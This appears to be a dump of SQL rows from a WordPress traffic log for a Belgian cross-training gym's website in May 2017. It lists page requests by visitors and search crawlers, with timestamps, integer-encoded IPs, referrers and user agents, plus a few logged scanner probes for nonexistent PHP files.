(72297, 1494483152.815615, 1538358342, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72298, 1494483158.419571, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72299, 1494483209.965721, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72300, 1494483316.912365, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72301, 1494483324.195816, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72302, 1494483393.347581, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72303, 1494483454.873579, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72304, 1494483855.191121, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/xmlrpc-blog.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72305, 1494483920.819869, 1538358342, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72306, 1494483921.011950, 1538358342, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72307, 1494483921.191454, 1538358342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72308, 1494484573.917228, 2760158144, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'),
(72309, 1494488584.525568, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72310, 1494488584.974529, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72311, 1494488585.377609, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72312, 1494488585.782761, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72313, 1494488586.297043, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72314, 1494488586.681035, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72315, 1494488587.188765, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72316, 1494488587.628837, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72317, 1494488588.066577, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72318, 1494488588.507173, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72319, 1494488588.899028, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72320, 1494488589.360924, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72321, 1494488589.792178, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72322, 1494488590.196847, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72323, 1494491370.066446, 3475901715, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72324, 1494491371.428006, 3475901715, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72325, 1494492221.894322, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72326, 1494492222.664230, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72327, 1494492223.286815, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72328, 1494492223.723952, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72329, 1494492224.244391, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72330, 1494492224.658641, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72331, 1494492225.071324, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72332, 1494492225.570580, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72333, 1494492226.030524, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72334, 1494492226.450061, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72335, 1494492226.898364, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72336, 1494492227.375608, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72337, 1494492227.863001, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72338, 1494492228.328603, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72339, 1494495484.525169, 786802763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(72340, 1494495524.618121, 3475901698, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72341, 1494496222.839092, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72342, 1494502633.185974, 3250483553, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72343, 1494502644.562460, 3250483553, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72344, 1494502649.357607, 3250483553, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72345, 1494502652.504043, 3250483553, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72346, 1494502666.132612, 3250483553, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72347, 1494504359.417060, 2637637389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72348, 1494504359.419042, 2637637389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72349, 1494505559.705266, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72350, 1494506700.518455, 2187902172, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72351, 1494506701.878302, 2187902172, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72352, 1494506727.694390, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72353, 1494506730.666905, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72354, 1494506752.292773, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72355, 1494506776.038447, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72356, 1494506794.842235, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72357, 1494506818.904980, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72358, 1494506829.389878, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72359, 1494506838.419989, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72360, 1494506846.306871, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72361, 1494506873.175465, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72362, 1494506882.502277, 2187902172, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(72363, 1494515532.030508, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72364, 1494515532.646842, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72365, 1494515533.115137, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72366, 1494515533.925332, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72367, 1494515534.432556, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72368, 1494515534.939491, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72369, 1494515535.559995, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72370, 1494515536.045280, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72371, 1494515536.551414, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72372, 1494515536.981284, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72373, 1494515537.419771, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72374, 1494515649.759750, 2509960075, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(72375, 1494518579.802419, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72376, 1494519355.292003, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72377, 1494521885.798841, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72378, 1494525155.566265, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72379, 1494526588.113703, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72380, 1494526827.564680, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/customizer.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72381, 1494527700.115515, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72382, 1494527700.747485, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72383, 1494527701.429800, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72384, 1494527702.345563, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72385, 1494527703.368713, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72386, 1494527703.772170, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72387, 1494527704.175796, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72388, 1494527704.648444, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72389, 1494527705.084485, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72390, 1494527705.496909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72391, 1494527705.918046, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72392, 1494527706.380676, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72393, 1494527706.795795, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72394, 1494527707.239309, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72395, 1494527927.410632, 1538510707, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72396, 1494527931.164205, 1538510707, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72397, 1494530085.530314, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72398, 1494533487.530450, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/popup-pomo.php', 'http://crosstrainingcenter.be/popup-pomo.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72399, 1494538717.963895, 1338304137, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72400, 1494541338.347825, 1439252500, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72401, 1494541367.203257, 1439252500, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72402, 1494541959.146467, 2637637389, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72403, 1494559987.558129, 1247140480, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(72404, 1494560970.167165, 1753419235, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72405, 1494560975.153067, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72406, 1494560976.762469, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72407, 1494560980.573172, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
